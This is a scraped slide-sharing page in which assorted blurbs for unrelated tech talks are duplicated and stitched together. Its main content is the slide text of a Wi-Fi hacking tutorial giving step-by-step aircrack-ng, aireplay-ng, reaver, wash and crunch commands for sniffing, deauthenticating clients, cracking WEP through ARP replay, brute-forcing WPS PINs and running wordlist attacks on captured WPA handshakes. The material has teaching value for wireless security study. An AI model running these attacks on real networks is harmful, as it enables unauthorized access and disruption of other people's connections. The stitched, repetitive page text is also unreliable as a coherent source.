Please note, this article does not intend to promote hacking. The intention is to help you understand the vulnerabilities in ssl and protect yourselves from the same. There are millions of innocent victims who fall prey because they are complacent the moment they see a 'secure https' symbol on their browser. I am trying to dispel that myth.
This is some basic information about Double Ratchet Algorithm.
It does not include any code but helps in how Actually Double Ratchet Works on ground level.
Please note, this article does not intend to promote hacking. The intention is to help you understand the vulnerabilities in ssl and protect yourselves from the same. There are millions of innocent victims who fall prey because they are complacent the moment they see a 'secure https' symbol on their browser. I am trying to dispel that myth.
This is some basic information about Double Ratchet Algorithm.
It does not include any code but helps in how Actually Double Ratchet Works on ground level.
Mitm(man in the middle) ssl proxy attacksJaeYeoul Ahn
This material is related at the Security of SSL Service as HTTPS. I used it for my security class at E-government course on the Kookmin university in south Korea.
Now we hear a word “DMVPN” more and more often, then what is “DMVPN” and what is the advantages DMVPN owning? Here we give a brief introduction of DMVPN.
AWS re:Invent 2016: Encryption: It Was the Best of Controls, It Was the Worst...Amazon Web Services
Encryption is a favorite of security and compliance professionals everywhere. Many compliance frameworks actually mandate encryption. Though encryption is important, it is also treacherous. Cryptographic protocols are subtle, and researchers are constantly finding new and creative flaws in them. Using encryption correctly, especially over time, also is expensive because you have to stay up to date.
AWS wants to encrypt data. And our customers, including Amazon, want to encrypt data. In this talk, we look at some of the challenges with using encryption, how AWS thinks internally about encryption, and how that thinking has informed the services we have built, the features we have vended, and our own usage of AWS.
Dos on 802.11 and other security issues ( Case Study ) Shrobon Biswas
This is a paper which demonstrates the blunders in the WEP encryption protocol and how to stage and spet up the attacks making use of such gory loopholes .
There is also a presentation i uploaded with the same name . Check that out if you liked the document .
Mitm(man in the middle) ssl proxy attacksJaeYeoul Ahn
This material is related at the Security of SSL Service as HTTPS. I used it for my security class at E-government course on the Kookmin university in south Korea.
Now we hear a word “DMVPN” more and more often, then what is “DMVPN” and what is the advantages DMVPN owning? Here we give a brief introduction of DMVPN.
AWS re:Invent 2016: Encryption: It Was the Best of Controls, It Was the Worst...Amazon Web Services
Encryption is a favorite of security and compliance professionals everywhere. Many compliance frameworks actually mandate encryption. Though encryption is important, it is also treacherous. Cryptographic protocols are subtle, and researchers are constantly finding new and creative flaws in them. Using encryption correctly, especially over time, also is expensive because you have to stay up to date.
AWS wants to encrypt data. And our customers, including Amazon, want to encrypt data. In this talk, we look at some of the challenges with using encryption, how AWS thinks internally about encryption, and how that thinking has informed the services we have built, the features we have vended, and our own usage of AWS.
Dos on 802.11 and other security issues ( Case Study ) Shrobon Biswas
This is a paper which demonstrates the blunders in the WEP encryption protocol and how to stage and spet up the attacks making use of such gory loopholes .
There is also a presentation i uploaded with the same name . Check that out if you liked the document .
This paper introduce practical techniques used by hackers to break the wireless security.
We recommend that the reader should have basic knowledge of wireless operation.
This ppt includes what is wireless hacking, types of wi-fi eg,wep,wpa,wpa/psk and terms related to it .this also conclude how to crack the wireless hacking ,the tools and commands required for it. this is very usefull . catch it..... :)
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
DevOps and Testing slides at DASA ConnectKari Kakkonen
My and Rik Marselis slides at 30.5.2024 DASA Connect conference. We discuss about what is testing, then what is agile testing and finally what is Testing in DevOps. Finally we had lovely workshop with the participants trying to find out different ways to think about quality and testing in different parts of the DevOps infinity loop.
Neuro-symbolic is not enough, we need neuro-*semantic*Frank van Harmelen
Neuro-symbolic (NeSy) AI is on the rise. However, simply machine learning on just any symbolic structure is not sufficient to really harvest the gains of NeSy. These will only be gained when the symbolic structures have an actual semantics. I give an operational definition of semantics as “predictable inference”.
All of this illustrated with link prediction over knowledge graphs, but the argument is general.
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Ramesh Iyer
In today's fast-changing business world, Companies that adapt and embrace new ideas often need help to keep up with the competition. However, fostering a culture of innovation takes much work. It takes vision, leadership and willingness to take risks in the right proportion. Sachin Dev Duggal, co-founder of Builder.ai, has perfected the art of this balance, creating a company culture where creativity and growth are nurtured at each stage.
Securing your Kubernetes cluster_ a step-by-step guide to success !KatiaHIMEUR1
Today, after several years of existence, an extremely active community and an ultra-dynamic ecosystem, Kubernetes has established itself as the de facto standard in container orchestration. Thanks to a wide range of managed services, it has never been so easy to set up a ready-to-use Kubernetes cluster.
However, this ease of use means that the subject of security in Kubernetes is often left for later, or even neglected. This exposes companies to significant risks.
In this talk, I'll show you step-by-step how to secure your Kubernetes cluster for greater peace of mind and reliability.
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
Generating a custom Ruby SDK for your web service or Rails API using Smithyg2nightmarescribd
Have you ever wanted a Ruby client API to communicate with your web service? Smithy is a protocol-agnostic language for defining services and SDKs. Smithy Ruby is an implementation of Smithy that generates a Ruby SDK using a Smithy model. In this talk, we will explore Smithy and Smithy Ruby to learn how to generate custom feature-rich SDKs that can communicate with any web service, such as a Rails JSON API.
Accelerate your Kubernetes clusters with Varnish CachingThijs Feryn
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
State of ICS and IoT Cyber Threat Landscape Report 2024 previewPrayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...UiPathCommunity
💥 Speed, accuracy, and scaling – discover the superpowers of GenAI in action with UiPath Document Understanding and Communications Mining™:
See how to accelerate model training and optimize model performance with active learning
Learn about the latest enhancements to out-of-the-box document processing – with little to no training required
Get an exclusive demo of the new family of UiPath LLMs – GenAI models specialized for processing different types of documents and messages
This is a hands-on session specifically designed for automation developers and AI enthusiasts seeking to enhance their knowledge in leveraging the latest intelligent document processing capabilities offered by UiPath.
Speakers:
👨🏫 Andras Palfi, Senior Product Manager, UiPath
👩🏫 Lenka Dulovicova, Product Program Manager, UiPath
The Art of the Pitch: WordPress Relationships and SalesLaura Byrne
Clients don’t know what they don’t know. What web solutions are right for them? How does WordPress come into the picture? How do you make sure you understand scope and timeline? What do you do if sometime changes?
All these questions and more will be explored as we talk about matching clients’ needs with what your agency offers without pulling teeth or pulling your hair out. Practical tips, and strategies for successful relationship building that leads to closing the deal.
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Jeffrey Haguewood
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on the notifications, alerts, and approval requests using Slack for Bonterra Impact Management. The solutions covered in this webinar can also be deployed for Microsoft Teams.
Interested in deploying notification automations for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
5. Network Basics
A network is nothing but a number of devices connected together sharing data and
resources!
All devices (wired or wireless) achieve this using same principle:
One device acts as a server and server contains data which is shared between
connected devices
In most Wi-Fi devices , server is a router and the shared data is the INTERNET!
All devices have a MAC address.
Each Packet has the source MAC address and Destination MAC Address.
7. Wireless Modes
There are eight modes that 802.11 wireless cards can operate in: Master (acting as an
access point), Managed (client, also known as station), Ad hoc, Repeater, Mesh, Wi-Fi
Direct, TDLS and Monitor mode.
However we are only going to talk about 2 modes :
Managed Mode : Here our Wi-Fi card acts like a client i.e. Only directed packets are received by
our card.
Monitor Mode : Here our Wi-Fi(NIC) card will sniff all the packets near it
(whether directed to it or not.)
8. Sniffing using airodump-ng
Airodump-ng is a program that is a part of aircrack-ng package, it's a
packet sniffer that allows us to capture all the packets that are in our
Wi-Fi card range. We can also scan all Wi-Fi networks around us and
gather info about them.
Using Airodump-ng:
> airmon-ng start [interface]
> airodump-ng [mon_interface]
9.
10. Lets see how we can compact our view to only our target.
For instance, I only want to view BMSCE_Hostel
> airodump-ng –channel [CH] --bssid [BSSID] –write [filename] [interface]
12. De-auth Attack
This attack is used to disconnect any device from any network within our range even if network
is protected with a key.
Hacker send deauthentication packets to the router pretending to be target
machine(by spoofing its MAC address)
At the same time , the hacker send packets to the target machine (pretending to be
router) telling it that it needs to re-authenticate itself.
We’ll be using a tool called aireplay-ng.
> aireplay-ng –deauth[number of packets] –a [AP’s BSSID] [INTERFACE]
--To de-authenticate all clients in a specific network
> aireplay-ng –deauth[number of packets] –a [AP’s BSSID] –c [target’s BSSID] [INTERFACE]
--To de-authenticate a specific client in a specific network
13.
14. Creating a Fake AP(honeypot)
Fake Access Point are made usually open to attract more number of people and sniff packets in between.
To accomplish this , we will need two Networks card:
1. NIC1 – One connected to internet (can be wired also)
2. NIC2 – Other to broadcast the AP.
17. WEP is an old encryption , but it is still used in some networks.
It uses an algorithm called RC4.
Each packet is encrypted at the AP and then is decrypted at the client.
WEP ensures that each packet has a unique key stream by using a 24-bit
random Initializing Vector (IV) , this IV is contained in text as plain text.
Now what do you think is the flaw in this encryption?
24-bit is a very short number and in a busy network , we can get 2 packets with same IVs.
Then we can use aircrack-ng to determine the key stream and WEP key using statistical attacks.
Now , there are two cases which would occur:
Basic Case : Traffic of network is high i.e. large number of packets
are transferred between sender and receiver.
Idle AP : The network is shallow , there is no exchange of packet
whatsoever. Or no clients are connected to it.
18. Tackling the Basic Case:
This is a easy one to handle, we can just run airodump-ng to log all the traffic from target network:
> airodump-ng –channel [CH] --bssid [BSSID] –write [filename] [interface]
Ex: airodump-ng –channel 6 –bssid 11:22:33:44:55:66 –write out wlan0mon
At the same time , we shall use the aircrack-ng to try and crack the key using the capture file
> aircrack-ng [filename]
Ex: aircrack-ng out01.cap
19.
20. The Idle AP case
In this case , we have to inject packets into the traffic in order to force the router to
create new packets with new IVs.
But before we can inject any packet into the traffic, we have to authenticate our Wi-Fi
card with AP as APs’ ignore any request that are not associated with it.
This can be done easily by aireplay-ng:
If the fakeauth is successful , the value under AUTH column will change to “OPN”.
> aireplay-ng --fakeauth 0 –a[target MAC] –h [our MAC] [interface]
21. Now that we have authenticated with the AP,we can use a method called
• ARP Request Reply
22. ARP Request Reply
In this method , after authenticating with target AP, we will wait for an ARP Packet.
We will capture this packet and inject this packet again into the traffic
This will force the AP to generate a new packet with new IV.
This process is repeated until number of IVs captured is sufficient to crack the key.
> aireplay-ng --arpreplay –b [target MAC] –h [our MAC] [interface]
27. WPS(Wi-Fi Protected Setup)
WPS is a feature that allows users to connect to WPS enabled networks , using a WPS push
button or by clicking on WPS functionality.
Authentication is done using a 8 digit long pin,
This is relatively a very small number and can be brute forced i.e. can be guessed.
A tool called reaver can then recover WPA/WPA2 key from the pin.
28. We are going to use a tool called wash to scan all the WPS enabled network nearby:
> wash –i [interface]
Steps:
29. As mentioned before reaver tool is used to get WPS PIN and can also find WPA PSK(will
explain in coming slides)
> reaver –b [target BSSID] –c [channel] –i[interface]
31. In WPA,each packets is encrypted with a unique temporary key, this means no. of data
we collect is irrelevant.
THIS IS A PROBLEM !
Before trying to access a WPA/WPA2 Network ,we essentially need to know how they work.
When client(Supplicant) establishes a successful connection with an AP(Authenticator), To
encrypt and share keys, a 4-way handshake takes place!
32. Key Terminologies:
MSK (Master Session Key): The master session is the first key which is generated either from
802.1X/EAP.
GTK (Group Temporal Key) : Group temporal key is used to encrypt all broadcast and multicast traffic
between an access point and multiple client devices. GTK is the key which is shared between all client
devices associated with 1 access point. For every access point, there will be a different GTK which will be
shared between its associated devices.
GMK (Group Master Key) : Group master key is used in a 4-way handshake to create GTK discussed
above. GTK is generated on every access point and shared with the devices connected to this AP.
33. PTK(Pairwise Transient Key): Pairwise transit key is used to encrypt all unicast traffic
between a client station and the access point. PTK is unique between a client station
and access point. To generate PTK, client device and access point need the following
information.
PTK = PRF (PMK + Anonce + SNonce + Mac (AA)+ Mac (SA))
PMK(Pairwise Master Key): Pairwise master is key generated from master session
key (MSK).It is used to generate PTK.
38. WPA packets is not useful as they do not contain any info that can be used to crack the key.
The only packets that contain information that can help us crack the password is the
handshake packets.
• Every time a client connects to the AP , a 4-way handshake occurs as explained.
• By capturing the handshake , we can use aircrack to launch a word list attack against the
handshake.
39. Capturing a Handshake
Handshake packets are sent every time a client associates with target AP.
1. Start airodump-ng on target AP
2. Wait for a client to connect to AP. But do we have that much time? I mean
think for a network where no new clients will likely to connect to it for days ,
years in some cases.
Do we know something which can help???
>airodump-ng –channel[CH] –bssid[BSSID] –write[filename] [interface]
> aireplay-ng --deauth [number of packets] –a[AP MAC] –c [target MAC] [interface]
De-auth attack!!
We can de-authenticate a connected client for a short amount of time so that
it will connect back automatically to AP
40.
41.
42. Creating a wordlist
You can either download a wordlist from the internet(I’ll be sharing links 🧐 )
OR you can create your own wordlist by using a tool called crunch.
> ./crunch [min] [max] [characters = lower|upper|numbers|symbols] –t [pattern] –o [file]
Ex: ./crunch 6 8 123456!”$* -t a@@@@b –o wordlist
43. Now that we have created the wordlist , only thing left is using aircrack-ng to crack the key.
Aircrack-ng combines the password in wordlist with AP-name (ESSID) to compute the
Pairwise Master Key(PMK) and compare it with handshake .
>aircrack-ng [Handshake file] –w [wordlist]
Ex- aircrack-ng handshake01.cap –w listpass